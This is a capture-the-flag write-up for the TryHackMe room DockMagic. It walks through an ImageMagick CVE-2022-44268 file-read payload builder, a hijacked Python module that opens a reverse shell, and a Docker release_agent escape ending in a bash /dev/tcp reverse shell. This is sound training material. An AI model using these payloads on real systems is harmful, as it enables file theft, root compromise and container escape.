# DockMagic

{% embed url="<https://tryhackme.com/room/dockmagic>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

## Recon

We start off with an Nmap scan of our target and discover just two open ports: SSH on port 22 (OpenSSH 8.4p1) and a web server on port 80 (nginx/1.18.0).

<figure><img src="/files/fnegzrZ01KzIpfcjPTA8" alt=""><figcaption></figcaption></figure>

Since only a web server is present, the first thing to do is enumerate possible directories. Running Gobuster against the IP of the machine, however, does not give us satisfying results.

<figure><img src="/files/FsNoNpxSNtPT9P3PWmqb" alt=""><figcaption></figcaption></figure>

We visit the page via the IP of the machine and get redirected to `http://site.empman.thm/`. We add that name to our `/etc/hosts` file and continue.

<figure><img src="/files/VIJPPtMubTsZFdfwfYKq" alt=""><figcaption></figcaption></figure>

Since we now know that subdomains are used, there might be more of them. We use FFuF to fuzz for virtual hosts by varying the `Host` header and spot two subdomains: `backup` and `site`. The subdomain `backup` looks promising.

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/dockmagic]
└─$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://empman.thm -H "Host: FUZZ.empman.thm"
```

<figure><img src="/files/MjIZNSwruq8xcRKG0kO9" alt=""><figcaption></figcaption></figure>

While Gobuster is still running in the background, we move on to enumerating the web page manually, since the first 5000 entries of the wordlist have not led to any results.

```bash
┌──(0xb0b㉿kali)-[~/Documents/tryhackme/dockmagic]
└─$ gobuster dir -u http://site.empman.thm -w /usr/share/wordlists/dirb/big.txt
```

<figure><img src="/files/mdkbtAmCCXOoOmNxK2OY" alt=""><figcaption></figcaption></figure>

At `backup.empman.thm` we find a zip file containing ImageMagick. ImageMagick is a free and open-source software suite for creating, editing, and converting raster and vector images. It provides a wide range of command-line tools and libraries for image manipulation and processing.

Because of the room name DockMagic, this might be about vulnerabilities in ImageMagick. Several are known, and the first that came to mind was ImageTragick. But that's another tale and not part of this challenge:

{% embed url="<https://ine.com/blog/imagetragick-a-tragick-image-conversion-tale>" %}

<figure><img src="/files/jLFtzgGQ2l7zMDbKaipW" alt=""><figcaption></figcaption></figure>

The zip contains, besides ImageMagick, a to-do list that gives us a valuable hint. There are two serious to-dos: one about revoking the user's SSH keys and the other about switching to another image processor, vips, instead of ImageMagick because of recent security vulnerabilities. This once again confirms our assumption that we can somehow exploit ImageMagick.

<figure><img src="/files/PhoTOsToJcwYxbgVRQiD" alt=""><figcaption></figcaption></figure>

We check out the `install-unix.txt` to spot the used version. It is `ImageMagick-7.0.9`.&#x20;

<figure><img src="/files/6Uvy2SfPy6ssJ3u6g16e" alt=""><figcaption></figcaption></figure>

Next, we check out `http://site.empman.thm/`. Here, we are able to create a user with a profile picture. If the upload is processed server-side by ImageMagick, this might be an entry point for an ImageMagick vulnerability.

<figure><img src="/files/qO4LQCWWEGV77Mrv2ygt" alt=""><figcaption></figcaption></figure>

After account creation, we are able to edit or delete our account; there is nothing more to do.

<figure><img src="/files/zyasDwrTXdqpXGJP9n9y" alt=""><figcaption></figcaption></figure>

## Foothold: Flag 1

For the foothold, we researched several CVEs regarding ImageMagick. One worked out: `CVE-2022-44268`. It affects versions up to and including `7.1.0-49`, which covers the `7.0.9` we found, and gives us an arbitrary file read. A PNG that carries a `tEXt` chunk with the keyword `profile` and a file path as its value makes a vulnerable ImageMagick read that file while processing the image and store its contents, hex-encoded, in the metadata of the image it writes out. No code runs on the target; the leak travels purely through the image metadata. This means that the avatar of our account contains the requested file after uploading.

{% embed url="<https://www.exploit-db.com/exploits/51261>" %}

<figure><img src="/files/XC4ALAkoe8pXaV2bHRpH" alt=""><figcaption></figcaption></figure>

As PoC we use the following:

{% embed url="<https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC>" %}

We modify our profile picture on our attacker machine with `pngcrush`, which adds a `tEXt` chunk with the keyword `profile` and the path we want to read as its value, here `/etc/passwd`. `tf2.png` is the source image and `passwd.png` the crafted one.

```bash
pngcrush -text a "profile" "/etc/passwd" tf2.png passwd.png
```

<figure><img src="/files/gtIA67aJRau6sJ7d3QNY" alt=""><figcaption></figcaption></figure>

Via `exiv2` we review our changes to the PNG file and confirm that the `profile` text chunk is present.

<figure><img src="/files/kS5Ay10LvGBCLR8VpPrY" alt=""><figcaption></figcaption></figure>

Next, we create an account with our modified profile picture. The account update functionality did not work properly, so we kept creating new accounts, one per file we wanted to read.

<figure><img src="/files/446H7ts3hSorO8WsV186" alt=""><figcaption></figcaption></figure>

We retrieve the profile picture from the Edit User page.

<figure><img src="/files/r8HSVM70KWSjAlfSJA7L" alt=""><figcaption></figcaption></figure>

To read the embedded information, we use ImageMagick's own `identify` tool (`identify -verbose`) on the downloaded picture; it lists the raw profile chunk that the server-side ImageMagick added.

<figure><img src="/files/TNVq255BNiyhfSl5Br76" alt=""><figcaption></figcaption></figure>

The file contents are stored as a hex dump.

<figure><img src="/files/LsqhhfdseVGe51hupjip" alt=""><figcaption></figcaption></figure>

For the sake of simplicity, we use CyberChef to decode the hex. We get `/etc/passwd` of the target system back, so the machine is indeed vulnerable to `CVE-2022-44268`. We are able to spot the user `emp`.

<figure><img src="/files/9flkcKxe4LHkkG7bh0pL" alt=""><figcaption></figcaption></figure>
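As an added example that is not part of the original write-up or of the linked PoC, the following Python script does both halves of the above in code: it builds a PNG carrying the same `profile` text chunk that `pngcrush` added, and it parses the image ImageMagick hands back, pulling the hex dump out of the `Raw profile type` chunk and decoding it, which replaces the `identify` plus CyberChef step. The "output image" at the bottom is constructed here to mimic the chunk layout ImageMagick's PNG coder writes; the leaked `/etc/passwd` lines in it are made up for the demo, not taken from the room.

```python
import binascii
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_payload_png(target_path: str) -> bytes:
    """1x1 RGB PNG with a tEXt chunk keyword 'profile' whose value is a file path.

    Same effect as the write-up's `pngcrush -text a "profile" "<path>"` step: an
    ImageMagick affected by CVE-2022-44268 reads that file and stores its bytes
    as a 'Raw profile type' text chunk in the image it writes out.
    """
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)     # 1x1, 8 bit, RGB
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00")          # filter byte + one pixel
    text = b"profile\x00" + target_path.encode("latin-1")
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", text)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def png_text_chunks(png: bytes) -> dict:
    """{keyword: text} for every tEXt and zTXt chunk, i.e. what exiv2/identify list."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    found, pos = {}, len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        pos += 12 + length                                    # length + type + data + crc
        key, _, rest = data.partition(b"\x00")
        if ctype == b"tEXt":
            found[key.decode("latin-1")] = rest.decode("latin-1")
        elif ctype == b"zTXt":                                # rest = method byte + zlib data
            found[key.decode("latin-1")] = zlib.decompress(rest[1:]).decode("latin-1")
        elif ctype == b"IEND":
            break
    return found


def decode_raw_profile(text: str) -> bytes:
    """Decode ImageMagick's raw-profile text: profile name, decimal byte count, then
    the bytes as hex (36 per line). This is what the write-up pasted into CyberChef."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    name, count, hexlines = lines[0], int(lines[1]), lines[2:]
    data = binascii.unhexlify("".join(hexlines))
    if len(data) != count:
        raise ValueError(f"profile {name!r}: header says {count} bytes, got {len(data)}")
    return data


def encode_raw_profile(name: str, data: bytes) -> str:
    """Inverse of decode_raw_profile, mirroring the layout ImageMagick's PNG coder
    writes (newline, name, newline, %8lu length, then hex with a newline every 36
    bytes). Only used here to build the constructed output image below."""
    body = "".join(("\n" if i % 36 == 0 else "") + f"{b:02x}" for i, b in enumerate(data))
    return f"\n{name}\n{len(data):8d}{body}\n"


def extract_leaked_file(output_png: bytes) -> bytes:
    """One call instead of identify -verbose plus CyberChef: find the raw profile
    chunk in the image the server handed back and return the leaked file bytes."""
    for key, value in png_text_chunks(output_png).items():
        if key.startswith("Raw profile type"):
            return decode_raw_profile(value)
    raise LookupError("no raw profile chunk: file unreadable or ImageMagick not vulnerable")


# Constructed stand-in for the processed avatar. The 'leaked' lines are made up, not
# output from the room; they only exercise the decoder.
LEAKED = b"root:x:0:0:root:/root:/bin/bash\nemp:x:1000:1000::/home/emp:/bin/bash\n"
FAKE_OUTPUT_PNG = (
    PNG_SIG
    + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    + _chunk(b"zTXt", b"Raw profile type profile\x00\x00"       # keyword, NUL, method 0
             + zlib.compress(encode_raw_profile("profile", LEAKED).encode("latin-1")))
    + _chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))
    + _chunk(b"IEND", b""))

if __name__ == "__main__":
    with open("passwd.png", "wb") as fh:                      # upload this as the avatar
        fh.write(build_payload_png("/etc/passwd"))
    print(png_text_chunks(build_payload_png("/etc/passwd")))   # {'profile': '/etc/passwd'}
    print(extract_leaked_file(FAKE_OUTPUT_PNG).decode())
```

Run it once to write `passwd.png`, upload that as the avatar, download the processed picture and pass its bytes to `extract_leaked_file()`. If ImageMagick on the server is patched, the file is not read and the function raises `LookupError` instead of returning bytes, which is the quickest way to tell a patched target from an unreadable file.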

Recalling the to-do note in the zip file about the SSH keys, we try to read the private SSH key of the user `emp` the same way.

<figure><img src="/files/AOhhOp99MaohZldpCfK1" alt=""><figcaption></figcaption></figure>

This time it takes a while; don't worry.

<figure><img src="/files/vu2rCKU5PDSe2RFTrUQf" alt=""><figcaption></figcaption></figure>

Again, we use identify on the downloaded profile picture...

<figure><img src="/files/zCG0DfT4xmkvX2iLDZsK" alt=""><figcaption></figcaption></figure>

And there is the ssh key encoded in hex.

<figure><img src="/files/MvQsz9c9IVRlSsH2dIcy" alt=""><figcaption></figcaption></figure>

We use CyberChef to decode it...

<figure><img src="/files/tS6WOKorK4QeNEuhAO39" alt=""><figcaption></figcaption></figure>

... and use it directly. We are able to log in as the user `emp` and find the first flag at `/home/emp/flag1.txt`.

<figure><img src="/files/EGCrvhL4AlyLXzce40ff" alt=""><figcaption></figcaption></figure>

## Privilege Escalation Part I: Flag 2

As always, on a Linux machine, we run `LinPEAS` to enumerate the target.

<figure><img src="/files/4qRZHy1srCGZtd5uaFUa" alt=""><figcaption></figcaption></figure>

We spot a cron job running `/usr/local/sbin/backup.py` with the `PYTHONPATH` variable set to `/dev/shm`. Interesting.

<figure><img src="/files/N5XE0XP9wCaNHp8P3UXx" alt=""><figcaption></figcaption></figure>

For confirmation, we run `pspy` and see the job running.

<figure><img src="/files/Qqh9V46uetmKt8YQ5sTh" alt=""><figcaption></figcaption></figure>

Luckily, we have write access to `/dev/shm`.

<figure><img src="/files/vJ52a7lFDVJhXaC9xRPi" alt=""><figcaption></figcaption></figure>

We inspect `/usr/local/sbin/backup.py` and see that it backs up `/home/emp/app` using the `cbackup` module.

<figure><img src="/files/NoowOyRmAIRpCgFaZEBQ" alt=""><figcaption></figcaption></figure>

Since we are able to write to `/dev/shm`, and Python searches the `PYTHONPATH` directories before the system library directories, we control exactly which `cbackup` module gets imported.

<figure><img src="/files/znBJHmDlAtR29tev5AdX" alt=""><figcaption></figcaption></figure>

For further reading on Python library hijacking, see the following link:

{% embed url="<https://rastating.github.io/privilege-escalation-via-python-library-hijacking/>" %}
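To make the search order concrete, the following added example (not code from the write-up) rebuilds the cron job's situation in a temporary directory and asks CPython's own import machinery which file `import cbackup` resolves to, before and after a rogue module is dropped into the `PYTHONPATH` directory. `hijack_points()` is the audit check to run against any privileged job's `PYTHONPATH`: it lists every writable directory the importer consults before reaching the legitimate module. The directory layout and the dummy `cbackup` module are constructed here.

```python
import importlib
import os
import tempfile
from importlib.machinery import PathFinder


def import_search_path(pythonpath: str, script_dir: str, system_dirs: list) -> list:
    """Order CPython consults for a plain `import x` in a script: the script's own
    directory first, then each PYTHONPATH entry, then stdlib / site-packages."""
    return [script_dir] + [p for p in pythonpath.split(os.pathsep) if p] + list(system_dirs)


def resolve_module(search_path: list, module: str):
    """Ask the real import machinery which file would satisfy `import module`."""
    spec = PathFinder.find_spec(module, search_path)
    return spec.origin if spec is not None else None


def hijack_points(search_path: list, module: str) -> list:
    """Directories searched *before* the legitimate module that the current user can
    write to. Any hit means the user can plant module.py and have it imported."""
    writable = []
    for directory in search_path:
        if (os.path.isfile(os.path.join(directory, module + ".py"))
                or os.path.isfile(os.path.join(directory, module, "__init__.py"))):
            break                                      # import resolves here; stop
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            writable.append(directory)
    return writable


def demo() -> dict:
    """Recreate the room: the real cbackup sits in a 'system' directory, PYTHONPATH
    points at a writable 'shm' directory that is searched first. Returns directory
    names so the outcome can be checked without knowing the temp path."""
    root = tempfile.mkdtemp(prefix="hijack-")
    shm, system = os.path.join(root, "shm"), os.path.join(root, "system")
    os.makedirs(shm)
    os.makedirs(system)
    with open(os.path.join(system, "cbackup.py"), "w") as fh:        # legitimate module
        fh.write("def backup(path):\n    return 'backup of ' + path\n")
    # script_dir stands in for /usr/local/sbin; a non-existent directory is used so
    # the result does not depend on who runs the demo
    path = import_search_path(shm, os.path.join(root, "sbin"), [system])
    before = resolve_module(path, "cbackup")
    writable = hijack_points(path, "cbackup")
    with open(os.path.join(shm, "cbackup.py"), "w") as fh:           # attacker's module
        fh.write("# module-level code here runs as the importing process's user\n")
    importlib.invalidate_caches()           # FileFinder caches directory listings
    after = resolve_module(path, "cbackup")
    return {
        "before": os.path.basename(os.path.dirname(before)),
        "after": os.path.basename(os.path.dirname(after)),
        "writable": [os.path.basename(d) for d in writable],
    }


if __name__ == "__main__":
    print(demo())   # {'before': 'system', 'after': 'shm', 'writable': ['shm']}
```

On the target, the equivalent check is `hijack_points(import_search_path("/dev/shm", "/usr/local/sbin", [<site-packages of the cron job's interpreter>]), "cbackup")`; the `/dev/shm` hit is the finding LinPEAS flagged. The fix on the defending side is the same list read backwards: a privileged job must not have a user-writable directory anywhere in its `PYTHONPATH`, nor in the directory its script lives in.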

We create our own module containing a reverse shell. The `cbackup` class with its no-op methods is there so that `backup.py` does not fail on whatever it calls on the module; the connection itself sits at module level, so it runs the moment the cron job imports `cbackup`.

`vim /dev/shm/cbackup.py`

{% code title="/dev/shm/cbackup.py" lineNumbers="true" %}

```python
import os
import pty
import socket

# Attacker listener; replace with your own address and port.
lhost = "10.11.58.51"
lport = 4445


# Stand-in for the real cbackup class so that backup.py's own calls do not raise
# before or after our payload has run. All methods are no-ops.
class cbackup:
    def close(*args):
        return

    def write(*args):
        return

    def __init__(self, *args):
        return


# Module-level code runs as soon as `import cbackup` is evaluated by the cron job,
# i.e. as root: connect back, wire stdin/stdout/stderr to the socket, spawn a shell.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')   # keep the interactive shell out of bash history
pty.spawn("/bin/bash")               # a pty gives a usable interactive shell
s.close()
```

{% endcode %}

We set up a listener on port 4445, place our module at `/dev/shm/cbackup.py` and wait. After a short while the cron job fires, our reverse shell connects, and we are `root`. First things first, we upgrade to a full TTY (see the link below). The second flag is at `/root/flag2.txt`.

<figure><img src="/files/GDz91GwKUBZIhkPSBC13" alt=""><figcaption></figcaption></figure>

{% embed url="<https://0xffsec.com/handbook/shells/full-tty/>" %}

## Privilege Escalation Part II: Flag 3

Again, we run `LinPEAS`. It reports that we are inside a Docker container and that we are able to break out of it via mounts; see `release_agent breakout 2`. Since the room is called DockMagic, this might be the correct track.

<figure><img src="/files/H6dLkr7zPC3YrYHWemXA" alt=""><figcaption></figcaption></figure>

For further Docker enumeration, the script `deepce.sh` is used.

{% embed url="<https://github.com/stealthcopter/deepce>" %}

But it just confirms that the breakout is possible via groups/mounts.

<figure><img src="/files/5Hud53ALx5EGTIAHISBy" alt=""><figcaption></figcaption></figure>

A proof of concept is described in the following link. After running this PoC, the machine had to be restarted, because only `ps aux`, which was initially placed in `/cmd`, kept being executed even after editing `/cmd`.

{% embed url="<https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape>" %}

Running the HackTricks PoC:

<figure><img src="/files/gzQR0QlvmFPbKMRmUKUy" alt=""><figcaption></figcaption></figure>

Since, at the time of writing, I was only able to use the exploit and did not fully understand it (something magical is happening here), I will refer to an excellent explanation of the Docker escape here:

{% embed url="<https://0xdf.gitlab.io/2021/05/17/digging-into-cgroups.html>" %}

Instead of `ps aux`, we place a reverse shell in `/cmd`.

```bash
# Mount a cgroup v1 hierarchy (the rdma controller is normally unused, so it is free)
# and create a child cgroup "x" inside it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
ls /tmp/cgrp
ls /tmp/cgrp/x
# Ask the kernel to run the release agent when the last process leaves cgroup "x"
echo 1 > /tmp/cgrp/x/notify_on_release
# The agent path is resolved on the host, where the container's "/" is the overlay upperdir
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# The agent itself: a bash reverse shell back to our listener
echo '#!/bin/bash' > /cmd
echo "/bin/bash -i >& /dev/tcp/10.11.58.51/4443 0>&1" >> /cmd
chmod a+x /cmd
# Put a short-lived shell into cgroup "x"; when it exits, the cgroup is empty and the
# kernel runs /cmd as root on the host
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```

We set up a listener on 4443. The last line, `sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"`, adds a throwaway shell to the cgroup and lets it exit immediately, so the cgroup empties and the kernel runs our release agent outside the container. With that, we have escaped the Docker container.

<figure><img src="/files/1Gqi3ql4J25HieTLYo9Q" alt=""><figcaption></figcaption></figure>
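As an added example that is not part of the write-up or of the HackTricks PoC, the following shell functions cover the two things the script above hides. First, the kernel runs the release agent as root in the host's mount namespace when the last process leaves a cgroup with `notify_on_release` set, so the file at `/cmd` inside the container has to be referenced as `<upperdir>/cmd` on the host; `host_path_for` performs that translation. Second, mounting the cgroup hierarchy and writing `release_agent` only works with `CAP_SYS_ADMIN`, which is what `has_cap_sys_admin` decodes from the `CapEff` mask. The `/etc/mtab` line at the bottom is constructed in the shape Docker's overlay2 mounts have; `preflight` reads the real `/proc/self/status` and `/etc/mtab` when you call it inside the container.

```bash
#!/bin/bash
# Pre-flight checks for the release_agent escape and the container-to-host path
# translation the PoC relies on. Added example; not code from the room.

# CAP_SYS_ADMIN is bit 21 of the CapEff mask in /proc/self/status. Without it the
# 'mount -t cgroup' step fails and release_agent stays read-only.
has_cap_sys_admin() {            # $1: hex CapEff mask, e.g. 0000003fffffffff
    [ $(( 0x$1 >> 21 & 1 )) -eq 1 ]
}

# release_agent is resolved in the host mount namespace, where the container's "/"
# is the overlay upperdir. Extract that directory from the overlay mount line.
host_upperdir() {                # $1: the overlay line from /etc/mtab or /proc/mounts
    printf '%s\n' "$1" | sed -n 's/.*upperdir=\([^,]*\).*/\1/p'
}

# Translate a container path into the host path the kernel will execute.
host_path_for() {                # $1: mtab line, $2: container path such as /cmd
    printf '%s%s\n' "$(host_upperdir "$1")" "$2"
}

# Live checks against the container we are in (only meaningful on Linux inside Docker).
preflight() {
    local capeff
    capeff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
    if ! has_cap_sys_admin "$capeff"; then
        echo "no CAP_SYS_ADMIN (CapEff=$capeff): release_agent route closed" >&2
        return 1
    fi
    grep -q cgroup /proc/filesystems || { echo "no cgroup support in kernel" >&2; return 1; }
    echo "release_agent must point at: $(host_path_for "$(grep ' / overlay ' /etc/mtab)" /cmd)"
}

# Constructed sample line (not from the room) in the shape of Docker's overlay2 mount.
SAMPLE_MTAB='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB,upperdir=/var/lib/docker/overlay2/c0ffee/diff,workdir=/var/lib/docker/overlay2/c0ffee/work 0 0'

host_path_for "$SAMPLE_MTAB" /cmd      # /var/lib/docker/overlay2/c0ffee/diff/cmd
```

A default (unprivileged) Docker container has a `CapEff` of `00000000a80425fb`, in which bit 21 is clear, so `preflight` fails there; the route only opens on containers started with `--privileged` or `--cap-add SYS_ADMIN`, which is the misconfiguration this room is built around. Note that the `sed` pattern here spells out `upperdir=`, while the PoC's `\perdir=` relies on GNU sed treating the unknown escape `\p` as a literal `p`.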

From there, we are able to spot the third flag at `/home/vagrant/flag3.txt`.

<figure><img src="/files/9b5KvqE3rQriADje8oZz" alt=""><figcaption></figcaption></figure>


